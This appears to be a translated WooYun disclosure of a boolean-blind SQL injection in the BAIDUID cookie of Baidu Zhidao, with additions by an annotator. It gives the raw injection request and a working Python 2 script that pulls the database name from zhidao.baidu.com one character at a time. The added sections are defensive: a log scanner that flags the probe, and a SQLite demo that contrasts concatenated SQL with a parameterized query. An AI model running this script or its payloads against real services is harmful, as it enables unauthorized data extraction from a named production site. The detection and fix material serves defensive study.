
A MySQL injection in Baidu Zhidao (with verification script)

2015-02-04 20:16

Injection point:

Code:
GET /liuyan/detail HTTP/1.1
Cookie: BAIDUID=-1'%20OR%20ascii(mid(database(),1,1))!=1%20AND%201=1%20--%20
X-Requested-With: XMLHttpRequest
Referer: http://zhidao.baidu.com
Host: zhidao.baidu.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

The BAIDUID value in the Cookie header is injectable.
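Added example, not part of the original report: a scan over constructed access-log lines that flags BAIDUID cookie values carrying the boolean-injection probe shown above. It URL-decodes the value first (the request above sends it percent-encoded), checks it against an allow-list, and for a hit recovers which character position of database() the probe tests and against which code, which is what an incident responder wants to know. The log format and the assumption that a legitimate BAIDUID is 32 hex digits optionally followed by ":FG=1" are mine, not the report's.

```python
"""Flag boolean-blind SQL injection probes in the BAIDUID cookie of access-log lines.

Added example, not the site's or the report's code. The log line format and the
expected shape of a legitimate BAIDUID value are assumptions made here."""
import re
from urllib.parse import unquote

# Constructed sample lines (not real traffic). Assumed format:
#   <client-ip> "<method> <path>" cookie="<raw Cookie header>"
SAMPLE_LOG = """\
10.0.0.5 "GET /liuyan/detail" cookie="BAIDUID=0123456789ABCDEF0123456789ABCDEF:FG=1"
10.0.0.7 "GET /liuyan/detail" cookie="BAIDUID=-1'%20OR%20ascii(mid(database(),1,1))!=1%20AND%201=1%20--%20"
10.0.0.7 "GET /liuyan/detail" cookie="BAIDUID=0.8274' OR ascii(mid(database(),3,1))=110 AND 1=1 -- "
10.0.0.9 "GET /liuyan/detail" cookie="OTHER=x; BAIDUID=0123456789ABCDEF0123456789ABCDEF:FG=1"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) "(?P<req>[^"]*)" cookie="(?P<cookie>.*)"\s*$')

# Assumption: a legitimate BAIDUID is 32 hex digits, optionally followed by ":FG=1".
LEGIT_RE = re.compile(r"^[0-9A-Fa-f]{32}(?::FG=1)?$")

# SQL fragments present in the report's payload: a quote followed by OR/AND,
# the MySQL functions it calls, and the trailing "-- " comment.
INJECTION_RE = re.compile(r"'\s*(?:or|and)\b|\b(?:ascii|mid|database)\s*\(|--\s", re.I)

# Which character position of database() the probe tests, and against which code.
PROBE_RE = re.compile(r"mid\(database\(\),(\d+),1\)\)\s*(!=|=)\s*(\d+)", re.I)


def cookie_value(header, name):
    """Return the raw value of cookie `name` from a Cookie header, or None."""
    for part in header.split(";"):
        key, _, value = part.partition("=")
        if key.strip() == name:
            return value
    return None


def classify(raw_value):
    """Classify a raw (URL-encoded) BAIDUID value.

    Returns None for an allow-listed value, otherwise (decoded_value, reason)."""
    decoded = unquote(raw_value)
    if LEGIT_RE.match(decoded):
        return None
    if INJECTION_RE.search(decoded):
        probe = PROBE_RE.search(decoded)
        if probe:
            pos, op, code = int(probe.group(1)), probe.group(2), int(probe.group(3))
            return decoded, "sqli-probe: database() char %d %s %d" % (pos, op, code)
        return decoded, "sqli-pattern"
    return decoded, "malformed-baiduid"


def scan_log(text):
    """Return a list of (client_ip, decoded_value, reason) for each suspicious line."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = cookie_value(m.group("cookie"), "BAIDUID")
        if raw is None:
            continue
        hit = classify(raw)
        if hit:
            findings.append((m.group("ip"),) + hit)
    return findings


if __name__ == "__main__":
    for ip, value, reason in scan_log(SAMPLE_LOG):
        print("%-10s %-40s %s" % (ip, reason, value))
```

The allow-list check comes first on purpose: with a cookie whose legitimate values have a fixed shape, anything outside that shape is worth logging even when it matches no known SQL fragment, and the pattern match only adds the explanation.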

Proof of vulnerability:

When the injected expression is true, the page returns 302; when it is false, it returns 200.

Example: guessing database() character by character yields:

Code:
iknow_liuyan



[Figure: baidu_mysqli_8.png]





Verification script:

Code:
# Verification script from the report (Python 2: httplib and print statements).
import httplib
import time
import string
import sys
import random
import urllib

headers = {
    'Cookie': '',
    'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}

# Characters tried at each position of the database name.
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')

print 'Try to retrieve database():'
user = ''
for i in range(1, 13):
    for payload in payloads:
        conn = httplib.HTTPConnection('zhidao.baidu.com', timeout=60)
        random.seed()
        # Random prefix varies the cookie value per request; the comparison
        # tests one character of database() at position i.
        s = str(random.random()) + "' OR ascii(mid(database(),%s,1))=%s AND 1=1 -- " % (i, ord(payload))
        headers['Cookie'] = 'BAIDUID=' + urllib.quote(s)
        conn.request(method='GET', url='/liuyan/detail', headers=headers)
        resp = conn.getresponse()
        html_doc = resp.read()
        # 302 means the expression was true, so this character is correct.
        if resp.status == 302:
            user += payload
            print '\n[In Progress]', user
            break
        else:
            print '.',
        conn.close()

print '\n[Done], current db is', user

Fix:

Filter and escape the input.
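Added example, not the site's code: the vulnerable query shape behind the report, built by string concatenation from the decoded cookie, beside the parameterized form that the fix amounts to, run against an in-memory SQLite database with small shims for the MySQL functions the payload calls (database, mid, ascii). The table `liuyan`, its columns, the query itself and the database name returned by the shim are assumptions; the two payloads are the report's true/false probe pair, and `leaks_boolean_oracle` checks whether a lookup still answers them differently, which is the same oracle as the 302/200 behaviour above.

```python
"""Vulnerable versus parameterized lookup keyed on the BAIDUID cookie.

Added example, not the site's code. Table, columns, query and the database
name returned by the shim are assumptions; the payloads are the report's."""
import sqlite3
from urllib.parse import unquote

# Payloads from the report: the first makes the injected condition true,
# the second (same probe, wrong character code) makes it false.
TRUE_PAYLOAD = "-1'%20OR%20ascii(mid(database(),1,1))!=1%20AND%201=1%20--%20"
FALSE_PAYLOAD = "-1'%20OR%20ascii(mid(database(),1,1))=1%20AND%201=1%20--%20"
LEGIT_COOKIE = "0123456789ABCDEF0123456789ABCDEF"  # constructed sample id


def build_demo_db():
    """In-memory stand-in for the MySQL backend, with constructed rows."""
    conn = sqlite3.connect(":memory:")
    # Shims so the report's MySQL payload parses and evaluates on SQLite.
    conn.create_function("database", 0, lambda: "iknow_liuyan")
    conn.create_function("mid", 3, lambda s, pos, n: s[pos - 1:pos - 1 + n])
    conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    conn.execute("CREATE TABLE liuyan (baiduid TEXT, content TEXT)")
    conn.executemany(
        "INSERT INTO liuyan VALUES (?, ?)",
        [(LEGIT_COOKIE, "hello"), ("FEDCBA9876543210FEDCBA9876543210", "world")],
    )
    return conn


def lookup_vulnerable(conn, raw_cookie):
    """Concatenates the decoded cookie into the SQL text (the bug).

    With TRUE_PAYLOAD the WHERE clause becomes
        baiduid = '-1' OR ascii(mid(database(),1,1))!=1 AND 1=1 -- '
    and every row is returned; with FALSE_PAYLOAD nothing is."""
    sql = "SELECT content FROM liuyan WHERE baiduid = '%s'" % unquote(raw_cookie)
    return [row[0] for row in conn.execute(sql)]


def lookup_fixed(conn, raw_cookie):
    """Binds the decoded cookie as a parameter, so it is only ever compared as data."""
    sql = "SELECT content FROM liuyan WHERE baiduid = ?"
    return [row[0] for row in conn.execute(sql, (unquote(raw_cookie),))]


def leaks_boolean_oracle(lookup, conn):
    """True if the true/false probe pair yields different results, i.e. the
    lookup still exposes the kind of oracle the report's 302/200 check used."""
    return lookup(conn, TRUE_PAYLOAD) != lookup(conn, FALSE_PAYLOAD)


if __name__ == "__main__":
    db = build_demo_db()
    for name, fn in (("vulnerable", lookup_vulnerable), ("fixed", lookup_fixed)):
        print("%-10s true=%r false=%r oracle=%s" % (
            name, fn(db, TRUE_PAYLOAD), fn(db, FALSE_PAYLOAD), leaks_boolean_oracle(fn, db)))
    print("fixed, legitimate id:", lookup_fixed(db, LEGIT_COOKIE))
```

Escaping the quote would also close this particular payload, but binding the value as a parameter removes the whole class: the payload text is never parsed as SQL, and the legitimate id still matches.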

Source: www.wooyun.org/bugs/wooyun-2015-088037
